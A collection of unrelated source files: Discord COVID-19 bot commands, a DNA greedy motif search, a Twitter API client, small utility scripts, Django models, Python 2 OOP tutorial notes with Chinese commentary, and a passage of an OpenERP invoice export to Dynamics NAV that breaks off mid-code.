                # Graphs are cached per region; regenerate only when missing.
                if not os.path.exists(path):
                    await plot_csv(
                        path,
                        history_confirmed,
                        history_recovered,
                        history_deaths,
                        is_us=is_us)
                embed = discord.Embed(
                    description=utils.mkheader(),
                    timestamp=dt.datetime.utcnow(),
                    color=utils.COLOR
                )
                embed.set_author(
                    name=f"Coronavirus COVID-19 - {state.capitalize()}",
                    icon_url=bot.author_thumb
                )
                embed.add_field(
                    name="<:confirmed:688686089548202004> Confirmed",
                    value=f"{confirmed:,}"
                )
                embed.add_field(
                    name="<:_death:688686194917244928> Deaths",
                    value=f"{deaths:,} (**{utils.percentage(confirmed, deaths)}**)"
                )
                # NOTE(review): both fields below are gated on `recovered`
                # being non-zero — for is_us regions neither is shown.
                if recovered:
                    embed.add_field(
                        name="<:recov:688686059567185940> Recovered",
                        value=f"{recovered:,} (**{utils.percentage(confirmed, recovered)}**)"
                    )
                    embed.add_field(
                        name="<:bed_hospital:692857285499682878> Active",
                        value=f"{active:,} (**{utils.percentage(confirmed, active)}**)"
                    )
        except Exception as e:
            logger.exception(e, exc_info=True)
            raise utils.RegionNotFound(
                "Region not found, it might be possible that the region isn't yet available in the data.")
    else:
        return await ctx.send("No arguments provided.")
    with open(path, "rb") as p:
        img = discord.File(p, filename=path)
        embed.set_footer(
            text=f"coronavirus.jessicoh.com/api/ | {list(history_confirmed['history'].keys())[-1]}",
            icon_url=bot.user.avatar_url
        )
        embed.set_thumbnail(
            url=bot.thumb + str(time.time())
        )
        embed.set_image(url=f'attachment://{path}')
        await ctx.send(file=img, embed=embed)
async def daily_command(bot, ctx: Union[commands.Context, SlashContext], *country):
    """Send a bar graph of daily new cases, worldwide or for one country."""
    embed = discord.Embed(
        description=utils.mkheader(),
        timestamp=dt.datetime.utcnow(),
        color=utils.COLOR
    )
    try:
        if country:
            data_confirmed = await utils.get(bot.http_session, f"/daily/confirmed/{' '.join(country).lower()}")
            data_recovered = await utils.get(bot.http_session, f"/daily/recovered/{' '.join(country).lower()}")
            data_deaths = await utils.get(bot.http_session, f"/daily/deaths/{' '.join(country).lower()}")
            path = data_confirmed["iso2"] + "daily.png"
            embed.set_author(
                name=f"Coronavirus COVID-19 Daily cases graph - {data_confirmed['name']}",
                icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data_confirmed['iso2'].lower()}.png"
            )
        else:
            data_confirmed = await utils.get(bot.http_session, f"/daily/confirmed/total")
            data_recovered = await utils.get(bot.http_session, f"/daily/recovered/total")
            data_deaths = await utils.get(bot.http_session, f"/daily/deaths/total")
            path = "daily_world.png"
            embed.set_author(
                name=f"Coronavirus COVID-19 Daily cases graph - World",
                icon_url=bot.author_thumb
            )
        # The graph is cached on disk; regenerate only when missing.
        if not os.path.exists(path):
            await plot_bar_daily(path, data_confirmed, data_recovered, data_deaths)
    except Exception as e:
        logger.exception(e)
        return await ctx.send("Please provide a valid country.")
    # The most recent data point is the last (date, value) pair in each series.
    embed.add_field(
        name="<:confirmed:688686089548202004> Recent confirmed",
        value=f"{list(data_confirmed['daily'].keys())[-1]} : {list(data_confirmed['daily'].values())[-1]:,}"
    )
    embed.add_field(
        name="<:recov:688686059567185940> Recent recovered",
        value=f"{list(data_recovered['daily'].keys())[-1]} : {list(data_recovered['daily'].values())[-1]:,}"
    )
    embed.add_field(
        name="<:_death:688686194917244928> Recent deaths",
        value=f"{list(data_deaths['daily'].keys())[-1]} : {list(data_deaths['daily'].values())[-1]:,}",
        inline=False
    )
    embed.set_thumbnail(
        url=bot.thumb + str(time.time())
    )
    with open(path, "rb") as p:
        img = discord.File(p, filename=path)
        embed.set_image(url=f'attachment://{path}')
        embed.set_footer(
            text="coronavirus.jessicoh.com/api/",
            icon_url=bot.user.avatar_url
        )
        await ctx.send(file=img, embed=embed)
async def news_command(bot, ctx: Union[commands.Context, SlashContext]):
    """Send recent COVID-19 news, one field per distinct source, size-capped."""
    if bot.news is None:
        # Lazy-load and cache the news feed on the bot instance.
        bot.news = utils.load_news()
    embed = discord.Embed(
        title=":newspaper: Recent news about Coronavirus COVID-19 :newspaper:",
        timestamp=utils.discord_timestamp(),
        color=utils.COLOR
    )
    sources = []
    length = 0
    max_size = 5800  # keep the total embed text under Discord's size limit
    for n in bot.news["articles"]:
        source = n["source"]["name"]
        if source not in sources:
            sources.append(source)
        else:
            # Only one article per source.
            continue
        try:
            length += len(
                f"🞄 **{source}** : {n['title']} {n['description']} [Link]({n['url']})")
            if length >= max_size:
                break
            embed.add_field(name=f"🞄 **{source}** : {n['title']}",
                            value=f"{n['description']} [Link]({n['url']})",
                            inline=False)
        except discord.errors.HTTPException:
            # A single malformed field should not kill the whole embed.
            break
    embed.set_thumbnail(
        url="https://avatars2.githubusercontent.com/u/32527401?s=400&v=4")
    embed.set_footer(text="newsapi.org",
                     icon_url=bot.user.avatar_url)
    await ctx.send(embed=embed)
|
import numpy as np
def read_input(filename):
    """Read k and t from the first line and the DNA strings from the rest.

    Returns (k, t, dnas) where dnas is a list of strings.
    """
    with open(filename, "r") as handle:
        first_line = handle.readline().strip().split(" ")
        dnas = handle.read().splitlines()
    return int(first_line[0]), int(first_line[1]), dnas
def profile_most_probable_kmer(genome, k, profile_matrix):
    """Return the k-mer of *genome* most probable under *profile_matrix*.

    profile_matrix rows hold per-position probabilities for A, C, G, T.
    Ties keep the leftmost k-mer; if every k-mer has probability 0, the
    first k-mer of the genome is returned.

    Fixes over the original: the loop variable no longer shadows the genome
    length, and an unexpected nucleotide raises ValueError instead of
    killing the whole process with exit().

    :raises ValueError: if genome contains a character other than A/C/G/T
    """
    row_index = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
    most_probable_pattern = genome[0:k]
    most_probable_probability = 0
    for i in range(0, len(genome) - k + 1):
        pattern = genome[i:i + k]
        probability = 1
        for offset, base in enumerate(pattern):
            if base not in row_index:
                raise ValueError("unexpected nucleotide %r in genome" % base)
            probability *= profile_matrix[row_index[base]][offset]
        if probability > most_probable_probability:
            most_probable_pattern = pattern
            most_probable_probability = probability
    return most_probable_pattern
# motifs is a t x k matrix of single-character lists.
def count_motifs(motifs, k):
    """Build the 4 x k count matrix (rows A, C, G, T) and the consensus string.

    The consensus takes, per column, the base with the strictly highest count
    seen so far in A, C, G, T order (so ties favour the earlier base).
    """
    count_matrix = [[0] * k for _ in range(4)]
    # Transpose so each entry is one column of the motif matrix.
    columns = np.array(motifs).T.tolist()
    consensus_string = ''
    for col_idx, column in enumerate(columns):
        best_count = 0
        popular_letter = ''
        for row_idx, base in enumerate('ACGT'):
            occurrences = column.count(base)
            count_matrix[row_idx][col_idx] = occurrences
            if occurrences > best_count:
                best_count = occurrences
                popular_letter = base
        consensus_string += popular_letter
    return count_matrix, consensus_string
def profile_motifs(count_matrix, t):
    """Divide every count by *t*, yielding the profile (probability) matrix."""
    return [[count / t for count in row] for row in count_matrix]
# consensus is the consensus string (indexable per position).
def score_motifs(motifs, consensus, k):
    """Count positions where a motif disagrees with the consensus (lower is better)."""
    return sum(
        1
        for motif in motifs
        for j in range(k)
        if motif[j] != consensus[j]
    )
def greedy_motif_search(k, t, dnas):
    """GreedyMotifSearch: choose the best-scoring collection of one k-mer
    per DNA string.

    :param k: motif length
    :param t: number of DNA strings (should equal len(dnas))
    :param dnas: list of DNA strings
    :return: list of t motifs, each a list of k characters
    """
    # Seed the best collection with the first k-mer of every DNA string.
    best_motifs = []
    for i in range(0, len(dnas)):
        first_kmer = dnas[i][0:k]
        best_motifs.append(list(first_kmer))
    for i in range(0, len(dnas[0]) - k + 1):
        # Grow a candidate collection starting from each k-mer of the first string.
        motifs = [list(dnas[0][i:i + k])]
        for j in range(1, t):
            # Profile built from the motifs chosen so far ...
            count_matrix, _ = count_motifs(motifs, k)
            profile_matrix = profile_motifs(count_matrix, len(motifs))  # number of rows of motifs to divide by
            # ... selects the most probable k-mer from the next DNA string.
            next_motif = profile_most_probable_kmer(dnas[j], k, profile_matrix)
            motifs.append(list(next_motif))
        # BUG FIX: compute the consensus for scoring from the *complete*
        # candidate collection.  The original reused a consensus computed
        # before the final motif was appended (stale), and raised NameError
        # when t == 1 because the inner loop never ran.
        _, consensus_string = count_motifs(motifs, k)
        # Consensus of the best collection so far, needed for its score.
        _, best_consensus = count_motifs(best_motifs, k)
        motifs_score = score_motifs(motifs, consensus_string, k)
        bestmotifs_score = score_motifs(best_motifs, best_consensus, k)
        if motifs_score < bestmotifs_score:
            best_motifs = motifs
    return best_motifs
def start():
    """Entry point: read (k, t, dnas) from dataset.txt, run the greedy
    search and print one motif per line."""
    k, t, dnas = read_input("dataset.txt")
    best = greedy_motif_search(k, t, dnas)
    for motif in best:
        print(''.join(motif))
# Standard script guard: run only when executed directly, not on import.
if __name__ == '__main__':
    start()
|
#!/usr/bin/env python
# encoding: utf-8
"""
Copyright (c) 2014 tiptap. All rights reserved.
"""
import time
import traceback
import twython
import logging
log = logging.getLogger(__name__)
RATE_LIMIT_RESOURCES = ["statuses", "followers", "search", "users"]
class TwitterClient(object):
    """Thin wrapper around twython that tracks Twitter API rate limits per
    resource/method and short-circuits calls once a window is exhausted.

    Every public wrapper returns a ``(resultCode, result)`` tuple where
    resultCode is 200 on success, 429 when the local bookkeeping says the
    window is spent, or the Twitter error code on API failure.
    """

    def __init__(self, appKey, accessToken, margins):
        """
        :param appKey: Twitter application key.
        :param accessToken: application-only OAuth access token.
        :param margins: dict with 'timeMargin' and 'countMargin' safety
            margins applied when reporting remaining quota.
        """
        self.appKey = appKey
        self.accessToken = accessToken
        self.twitter = twython.Twython(
            self.appKey,
            access_token=self.accessToken,
            client_args=dict(timeout=30)
        )
        self._init_rate_limits(margins)

    def get_user_timeline(self, twitterId, twitterName, **kwargs):
        """Fetch a user's timeline by id (preferred) or screen name."""
        params = {k: v for k, v in kwargs.items() if v}
        params['count'] = params.get('count') or 200
        params['include_rts'] = "false"
        params['tweet_mode'] = "extended"
        if twitterId:
            params['user_id'] = twitterId
        elif twitterName:
            params['screen_name'] = twitterName
        else:
            # No target given: log and let Twitter reject the call.
            log.info("get_user_timeline needs twitterId or twitterName")
        log.info("get_user_timeline, params: %s" % params)
        return self._do_twitter(
            "get_user_timeline",
            "statuses",
            "user_timeline",
            **params
        )

    def get_followers_ids(self, twitterName, count, **kwargs):
        """Fetch follower ids for a screen name."""
        params = dict(
            screen_name=twitterName,
            count=count
        )
        params.update(kwargs)
        log.info("get_followers_ids, params: %s" % params)
        return self._do_twitter(
            "get_followers_ids",
            "followers",
            "ids",
            **params
        )

    def lookup_user(self, twitterIds, twitterNames):
        """Bulk-fetch user profiles by ids and/or screen names."""
        params = {}
        if twitterIds:
            params['user_id'] = ",".join(twitterIds)
        if twitterNames:
            params['screen_name'] = ",".join(twitterNames)
        if not twitterIds and not twitterNames:
            log.info("lookup_user needs twitterIds or twitterNames")
        log.info("lookup_users, params: %s" % params)
        return self._do_twitter(
            "lookup_user",
            "users",
            "lookup",
            **params
        )

    def show_user(self, twitterId, twitterName):
        """Fetch a single user's profile by id or screen name."""
        if twitterId:
            params = dict(user_id=twitterId)
        elif twitterName:
            params = dict(screen_name=twitterName)
        else:
            # BUG FIX: `params` used to be undefined on this path, raising
            # NameError below.  Fall through with empty params so the call
            # fails with a Twitter error, matching lookup_user's behaviour.
            log.info("show_user needs twitterId or twitterName")
            params = {}
        log.info("show_users, params: %s" % params)
        return self._do_twitter(
            "show_user",
            "users",
            "show",
            **params
        )

    def search(self, query, **kwargs):
        """Run a tweet search for *query*."""
        params = dict(q=query)
        params.update(kwargs)
        log.info("search, params: %s" % params)
        return self._do_twitter(
            "search",
            "search",
            "tweets",
            **params
        )

    def _do_twitter(self, functionName, resource, method, **params):
        """Invoke a twython method with rate-limit bookkeeping.

        :return: (resultCode, result); resultCode is None if an unexpected
            exception occurred (logged with traceback).
        """
        if self.limits[resource][method]['remaining'] <= 0:
            return 429, None
        # A fresh client per call; the per-call client also carries the
        # response headers read by _update_rate_limit below.
        apiClient = twython.Twython(
            app_key=self.appKey,
            access_token=self.accessToken,
            client_args=dict(timeout=30)
        )
        function = getattr(apiClient, functionName)
        result = None
        # BUG FIX: resultCode was unbound when the catch-all handler ran,
        # raising NameError at the return statement.
        resultCode = None
        try:
            result = function(**params)
            resultCode = 200
        except twython.TwythonRateLimitError as error:
            # Must precede TwythonError (it is a subclass of it).
            self._hit_rate_limit(resource, method)
            resultCode = error.error_code
        except (twython.TwythonError, twython.TwythonAuthError) as error:
            log.info("Twitter error: %s" % error.msg)
            resultCode = error.error_code
        except Exception:
            # Narrowed from a bare except so KeyboardInterrupt/SystemExit
            # still propagate.
            log.error(
                "unexpected error accessing Twitter API, %s" %
                traceback.format_exc()
            )
        self._update_rate_limit(apiClient, resource, method)
        return resultCode, result

    def get_rate_limits(self, resource, method):
        """Report quota for resource/method with the configured safety margins.

        If the window has passed its reset time, the remaining count is
        restored to the window limit first.
        """
        limits = self.limits[resource][method]
        if time.time() > limits['reset'] + self.timeMargin:
            limits['remaining'] = limits['limit']
        return dict(
            remaining=(limits['remaining'] - self.countMargin),
            reset=(limits['reset'] + self.timeMargin),
            limit=limits['limit']
        )

    def _init_rate_limits(self, margins):
        """Seed self.limits from Twitter's rate_limit_status endpoint.

        self.limits maps resource -> method -> {remaining, reset, limit}.
        """
        apiClient = twython.Twython(
            app_key=self.appKey,
            access_token=self.accessToken,
            client_args=dict(timeout=30)
        )
        params = dict(resources=",".join(RATE_LIMIT_RESOURCES))
        body = apiClient.get_application_rate_limit_status(**params)
        self.limits = {}
        for resource in body['resources'].keys():
            self.limits[resource] = {}
            for location in body['resources'][resource]:
                # Location looks like "/statuses/user_timeline"; the method
                # name is the second path component.
                method = location.split('/')[2]
                methodLimits = body['resources'][resource][location]
                self.limits[resource][method] = dict(
                    remaining=methodLimits['remaining'],
                    reset=methodLimits['reset'],
                    limit=methodLimits['limit']
                )
        self.timeMargin = margins['timeMargin']
        self.countMargin = margins['countMargin']

    def _update_rate_limit(self, apiClient, resource, method):
        """Refresh the cached limits from the last response's x-rate-limit headers."""
        limits = self.limits[resource][method]
        header = apiClient.get_lastfunction_header(
            'x-rate-limit-remaining'
        )
        if header:
            limits['remaining'] = int(header)
        header = apiClient.get_lastfunction_header(
            'x-rate-limit-reset'
        )
        if header:
            limits['reset'] = int(header)
        remainingTime = limits['reset'] - time.time()
        log.info(
            "window remaining: %s calls, %d seconds" %
            (limits['remaining'], remainingTime)
        )

    def _hit_rate_limit(self, resource, method):
        """Record a 429 from Twitter by zeroing the local remaining count."""
        log.warning("Pissed off Twitter! Rate limit (429) response")
        self.limits[resource][method]['remaining'] = 0
|
'''
Spiral copy
'''
import numpy
def spiral_copy(mat):
    """Return the elements of the 2-D numpy array *mat* in clockwise spiral order.

    Peels the outer ring (top row, right column, bottom row, left column)
    and recurses on the inner sub-matrix.
    """
    if len(mat) == 0:
        return []
    n_rows, n_cols = len(mat), len(mat[0])
    # Top row, left to right.
    ring = [mat[0, col] for col in range(n_cols)]
    # Right column, top to bottom (skipping the corner already taken).
    ring += [mat[row, n_cols - 1] for row in range(1, n_rows)]
    # Bottom row, right to left - only if there is a distinct bottom row.
    if n_rows > 1:
        ring += [mat[n_rows - 1, col] for col in range(n_cols - 2, -1, -1)]
    # Left column, bottom to top - only if there is a distinct left column.
    if n_cols > 1:
        ring += [mat[row, 0] for row in range(n_rows - 2, 0, -1)]
    return ring + spiral_copy(mat[1:n_rows - 1, 1:n_cols - 1])
# Demo: run spiral_copy on a tiny matrix (larger example kept for reference).
# a = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10], [11, 12, 13, 14, 15], [16, 17, 18, 19, 20]]
a = numpy.array([[1]])
print()
print(spiral_copy(a))
# https://javabypatel.blogspot.com/2016/11/print-matrix-in-spiral-order-recursion.html
|
#!/usr/bin/python
import sys
# Open the input file that will be reduced to a CG-only gff
fileHandle = open(sys.argv[1])
# Create an output file next to the input
OutFileName = sys.argv[1] + '_CG-only.gff'
OutFile = open(OutFileName, 'w')
# Give your output file headers in the first line
OutFile.write("Chr\tReads\tContext\tStart\tEnd\tMC\tStrand\tReading_frame \n")
# Skip the first (header) line of the input file
fileHandle.readline()
# BUG FIX: the original tested 'CG' only on the *second* line and then either
# copied every remaining line unfiltered, or read one more line and stopped.
# Each data line must be tested individually for the CG context.
for line in fileHandle:
    if 'CG' in line:
        # Split the line into its elements and write them in the new order
        LineElements = line.split()
        OutFile.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t.\n' % (LineElements[0],LineElements[5],LineElements[3],LineElements[1],LineElements[1],LineElements[4],LineElements[2]))
# Close the input file
fileHandle.close()
# Close the output file
OutFile.close()
# print("...") works identically under Python 2 and 3 for a single argument
print("CG-only gff created.")
|
from django.db import models
from user.models import User
# Create your models here.
class Event(models.Model):
    """An event posted by a user; event_type 0 = Red, 1 = Black (see field comment)."""

    class Meta:
        verbose_name = "事件"
        verbose_name_plural = "事件"
        # Composite indexes for listing by type/recency and by recency/votes.
        index_together = [
            ['event_type', 'created_at'],
            ['created_at', 'vote_count']
        ]

    title = models.CharField(max_length=32, verbose_name="标题")
    content = models.TextField(default='', verbose_name="正文")
    # NOTE(review): blank=None is falsy, so it behaves like blank=False even
    # though null=True - blank=True was probably intended; confirm.
    author = models.ForeignKey(User, related_name='events', on_delete=models.CASCADE, blank=None, null=True)
    event_type = models.SmallIntegerField(default=0) # 0 Red 1 Black
    # Vote tally stored on the event itself - presumably denormalized from
    # Vote rows for cheap ordering; verify against the updating code.
    vote_count = models.IntegerField(default=0)
    # Soft-delete flag.
    is_delete = models.BooleanField(default=False)
    created_at = models.DateTimeField(auto_now_add=True, db_index=True)
    updated_at = models.DateTimeField(auto_now=True, db_index=True)
class Vote(models.Model):
    """A user's vote on an Event; at most one vote per (event, author) pair."""

    class Meta:
        verbose_name = "投票"
        verbose_name_plural = "投票"
        index_together = [
            ['event', 'vote'],
            ['event', 'created_at']
        ]
        # Enforces one vote per user per event.
        unique_together = (
            ('event', 'author')
        )

    # Intended values for `vote`.  NOTE(review): this list is not wired into
    # the field below (no choices=...), so other values are not rejected.
    VOTE_CHOICE = [-1, 0, 1]
    event = models.ForeignKey(Event, on_delete=models.CASCADE, null=True, blank=True)
    vote = models.SmallIntegerField(default=1)
    # NOTE(review): blank=None behaves like blank=False; confirm intent.
    author = models.ForeignKey(User, related_name='votes', on_delete=models.CASCADE, blank=None, null=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self):
        return "<Vote {} on {}: {}>".format(self.author, self.event, self.vote)
|
"""
之前的程序中都是根据操作数据的函数或语句块来设计程序的。这被称为面向过程的编程。
还有一种把数据和功能结合起来,用称为对象的东西包裹起来组织程序的方法。这种方法称为面向对象的编程理念。
类和对象是面向对象编程的两个主要方面。类创建一个新类型,而对象这个类的实例。这类似于你有一个int类型的变量,这存储整数的变量是int类的实例(对象)。
对象可以使用普通的属于对象的变量存储数据。属于一个对象或类的变量被称为域。
对象也可以使用属于类的函数来具有功能。这样的函数被称为类的方法。
域和方法可以合称为类的属性。
域有两种类型--属于每个实例/类的对象或属于类本身。它们分别被称为实例变量和类变量。
类使用class关键字创建。类的域和方法被列在一个缩进块中。
self
类
对象的方法
_init_方法
类与对象的方法
继承
"""
#self
"""
类的方法与普通的函数只有一个特别的区别--它们必须有一个额外的第一个参数名称,但是
在调用这个方法的时候你不为这个参数赋值,Python会提供这个值。这个特别的变量指对象本
身,按照惯例它的名称是self。
Python如何给self赋值以及为何你不需要给它赋值?
假如你有一个类称为MyClass和这个类的一个实例MyObject。当你调用这个对象的方法MyObject.method(arg1,arg2)的时候,
这会由Python自动转为MyClass.method(MyObject,arg1,arg2)--这就是self的原理了。
"""
#类
#filename:simplestclass.py
# The simplest possible class: an empty body marked with `pass`.
class Person:
    pass
# Create an object/instance by following the class name with parentheses.
p=Person()
print p
# Prints <__main__.Person instance at 0x...>: there is now an instance of
# the Person class in the __main__ module.
#对象的方法
#filename:method.py
class Person:
    # Note that sayhi takes no caller-supplied arguments, yet `self` still
    # appears in the definition - Python supplies it automatically.
    def sayhi(self):
        print r"hello,how are you!"
p=Person()
p.sayhi()
#End of method.py
#_init_方法
"""
__init__方法在类的一个对象被建立时,马上运行。(初始化)
"""
#filename:class_init.py
class Person2:
    # __init__ takes a parameter `name` (plus the usual self) and creates a
    # new field, also called name.  They are two different variables even
    # though they share a name; the dot notation tells them apart.
    def __init__(self,name):
        self.name=name
        print r"初始化参数:",self.name
    def __del__(self):
        print r"初始化删除"
    def sayhi(self):
        print r"Hello,my name is:",self.name
# line 73, in <module> h = Person2('swaro')TypeError: this constructor takes no arguments
#h = Person2('swaroop')
# Cause: in Python the constructor must be spelled __init__ with DOUBLE
# underscores on both sides, not _init_.
h=Person2('swaroop')
h.sayhi()
#End of class_init.py
#类与对象的方法
"""
有两种类型的 域 ——类的变量和对象的变量,它们根据是类还是对象 拥有 这个变量而区分。
类的变量 由一个类的所有对象(实例)共享使用。只有一个类变量的拷贝,所以当某个对象
对类的变量做了改动的时候,这个改动会反映到所有其他的实例上。
对象的变量 由类的每个对象/实例拥有。因此每个对象有自己对这个域的一份拷贝,即它们不
是共享的,在同一个类的不同实例中,虽然对象的变量有相同的名称,但是是互不相关的。
"""
#filename:objvar.py
class Person3:
    '''Represents a person.'''
    population=0
    #population=0
    #Debugger: Debug process paused; pid=6860 [1 modules loaded]
    # population belongs to the Person3 class, so it is a class variable.
    # name belongs to each object (it is assigned through self), so it is an
    # instance variable.
    def __init__(self,name):
        '''Initalizes the person's data '''
        self.name=name
        print('Inializing %s')%self.name
        Person3.population+=1
    # Like __init__, there is a special __del__ method; it runs when the
    # object goes away, i.e. when it is no longer used and its memory is
    # returned to the system.  Here it simply decrements Person3.population.
    # There is no guarantee about *when* __del__ runs; use the del statement
    # to force it.
    def __del__(self):
        '''I am dying...'''
        print '%s say goodbye!'%self
        Person3.population-=1
        if Person3.population == 0:
            print r"I am the last one."
        else:
            print "There are still %d person left."%Person3.population
    def sayhi(self):
        '''Greeting by the person;
        Really, that's all it does'''
        print 'Hi,my name is %s'%self.name
    def howmany(self):
        '''print the current population.'''
        if Person3.population == 1:
            print r"I'am the only person here!"
        else:
            print r"We have %d person here."%Person3.population
swaroop = Person3('swaroop')
swaroop.sayhi()
swaroop.howmany()
kalam = Person3('kalam')
kalam.sayhi()
kalam.howmany()
swaroop.sayhi()
swaroop.howmany()
print r"看一下文档字符串效果:"
print Person3._doc_
print Person3.sayhi.__doc__
if __name__ == '__main__':
print 'this program is being run by itself.'
else:
print 'I am being imported from other module'
"""
Python中所有的类成员(包括数据成员)都是公共的,所有的方法都是有效的。
只有一个例外:如果你使用的数据成员名称以 双下划线前缀 比如__privatevar,Python的名称
管理体系会有效地把它作为私有变量。
"""
#End of objvar.py
#继承
"""
面向对象的编程带来的主要好处之一是代码的重用,实现这种重用的方法之一是通过继承机制。继承完全可以理解成类之间的 类型和子类型 关系。
"""
#inherit.py
class Schoolmember:
    '''Represents any schoolmember!'''
    def __init__(self,name,age):
        self.name=name
        self.age=age
        print r"Initalizing school member:%s"%self.name
    def tell(self):
        '''Tell my details:'''
        # Trailing comma keeps output on the same line so subclasses can
        # append their own details after calling this method.
        print 'Name:"%s";age:"%d"'%(self.name,self.age),
# Inheritance: give the base class name in parentheses after the class name.
class Teacher(Schoolmember):
    '''Represents a teacher!'''
    def __init__(self,name,age,salary):
        # Explicitly call the base class __init__ (passing self) to
        # initialise the Schoolmember part of this object.
        Schoolmember.__init__(self, name, age)
        self.salary=salary
        print 'Initalizing Teacher:%s'%self.name
    def tell(self):
        Schoolmember.tell(self)
        print 'Salary:"%d"'%self.salary
class Student(Schoolmember):
    '''Represents a student!'''
    def __init__(self, name,age,marks):
        # Initialise the inherited Schoolmember part first.
        Schoolmember.__init__(self, name, age)
        self.marks=marks
        print 'Initalizing Student:%s'%self.name
    def tell(self):
        Schoolmember.tell(self)
        print 'Mark:"%d"'%self.marks
t=Teacher('Mrs.shriv',40,30000)
s=Student('swaroop',22,75)
print #prints a blank line
members=[t,s]
# Polymorphism: each member runs its own tell() - Teacher appends salary,
# Student appends marks.
for member in members:
    member.tell()
#End of inherit.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Date ID Message
# 21-12-2011 POP-001 Change file type to cp874 (support window)
import math
from osv import fields,osv
import tools
import pooler
from tools.translate import _
from decimal import *
import decimal_precision as dp
import netsvc
import csv
import time
import codecs
from operator import itemgetter
import pymssql
class account_invoice(osv.osv):
    """account.invoice extension: adds a `nav_exported` flag plus scheduled
    jobs that dump not-yet-exported supplier/customer invoices to CSV files
    for import into Microsoft Dynamics NAV (one file per invoice).
    """
    _name = "account.invoice"
    _description = "Add Dimension"
    _inherit = "account.invoice"
    _columns = {
        # True once the invoice has been written out to a NAV CSV file.
        'nav_exported': fields.boolean('Exported'),
    }
    _defaults = {
        'nav_exported': False,
    }

    def write(self, cr, uid, ids, vals, context=None):
        """Clear the exported flag on every write so a modified invoice is
        picked up again by the next export run."""
        if context is None:
            context = {}
        vals.update({'nav_exported': False})
        return super(account_invoice, self).write(cr, uid, ids, vals, context=context)

    def schedule_export_supplier_invoice(self, cr, uid, context=None):
        """Cron job: export each unexported supplier invoice to
        "<config.path>PI-<company>-<invoice id>.csv" and mark it exported."""
        purchase_export_sql = """
            select id from account_invoice
            where nav_exported = False and type = 'in_invoice' order by id
        """
        cr.execute(purchase_export_sql)
        export_ids = map(itemgetter(0), cr.fetchall())
        for row in export_ids:
            # One row per invoice line, joined with the partner, posting-group
            # and purchase-order dimension data NAV needs.
            purchase_line_sql = """
                select
                    account_invoice.company_id as company_id,
                    'Invoice' as document_type,
                    res_partner.nav_code_supplier as buy_from_vendor_no,
                    account_invoice.origin as purchase_no,
                    res_partner.nav_code_supplier as pay_to_vendor_no,
                    coalesce(res_partner_address.name,'') as pay_to_contact,
                    to_char(CURRENT_DATE,'DD/MM/yyyy') as order_date,
                    to_char(CURRENT_DATE,'DD/MM/yyyy') as posting_date,
                    account_payment_term.code_nav as payment_term_code, --payment_term (int)
                    '' as currency_code, --currency_id (int)
                    'Yes' as price_include_vat, --account_invoice.amount_total as
                    '' as vendor_invoice_no,
                    coalesce(address2.name,'') as buy_from_contact,
                    to_char(now(), 'DD/MM/yyyy HH:mm:ss') as last_interfaced,
                    'G/L Account' as nav_type,
                    account_account.code as account_no,
                    replace(account_invoice_line.name,'"','') as description,
                    replace(account_invoice_line.name,'"','') as description2,
                    account_invoice_line.quantity as quantity,
                    account_invoice_line.price_unit as direct_unit_cost,
                    account_invoice_line.discount as line_discount,
                    post1.code_nav as gen_posting_group,
                    post2.code_nav as vat_posting_group,
                    '' as uom,
                    post3.code_nav as wht_posting_group,
                    d1.code as dimension_1,
                    d2.code as dimension_2,
                    d3.code as dimension_3,
                    d4.code as dimension_4,
                    d5.code as dimension_5,
                    d6.code as dimension_6,
                    account_invoice.id as invoice_id
                from account_invoice_line
                join account_invoice on account_invoice_line.invoice_id = account_invoice.id
                left join res_partner_address on account_invoice.address_invoice_id = res_partner_address.id
                left join res_partner_address address2 on account_invoice.address_contact_id = address2.id
                left join account_account on account_invoice_line.account_id = account_account.id
                left join purchase_order on purchase_order.name = account_invoice.origin
                left join res_partner on account_invoice.partner_id = res_partner.id
                left join account_payment_term on account_invoice.payment_term = account_payment_term.id
                left join ineco_nav_postmaster post1 on res_partner.gen_bus_posting_group_id = post1.id
                left join ineco_nav_postmaster post2 on res_partner.vat_bus_posting_group_id = post2.id
                left join ineco_nav_postmaster post3 on res_partner.wht_bus_posting_group_id = post3.id
                left join ineco_nav_dimension d1 on purchase_order.dimension_company = d1.id
                left join ineco_nav_dimension d2 on purchase_order.dimension_department = d2.id
                left join ineco_nav_dimension d3 on purchase_order.dimension_project = d3.id
                left join ineco_nav_dimension d4 on purchase_order.dimension_product = d4.id
                left join ineco_nav_dimension d5 on purchase_order.dimension_retailer = d5.id
                left join ineco_nav_dimension d6 on purchase_order.dimension_customer = d6.id
                where
                    account_invoice.type = 'in_invoice' --supplier invoice
                    and account_invoice.nav_exported = False
                    and account_invoice.id = %s
            """
            # `row` is an integer id fetched above, so %-interpolation here
            # is not an injection risk in practice.
            cr.execute(purchase_line_sql % row)
            line_data = cr.dictfetchall()
            if len(line_data):
                line_no = 1
                # Export configuration (output path) per company and type.
                config_ids = self.pool.get('ineco.export.config').search(cr, uid, [('type','=','purchase'),('company_id','=',line_data[0]['company_id'])])
                config_obj = self.pool.get('ineco.export.config').browse(cr, uid, config_ids)
                if config_obj:
                    config = config_obj[0]
                    path = config.path+"PI-"+str(line_data[0]['company_id']) +"-"+str(row)+".csv"
                    #POP-001
                    f = open(path, 'wt')
                    #f = codecs.open(path, encoding='cp874', mode='w+')
                    writer = csv.writer(f)
                for line in line_data:
                    if config_obj:
                        writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
                        try:
                            writer.writerow([
                                line['document_type'],
                                line['buy_from_vendor_no'].encode('cp874'), #NAV
                                line['purchase_no'],
                                line['pay_to_vendor_no'].encode('cp874'), #NAV
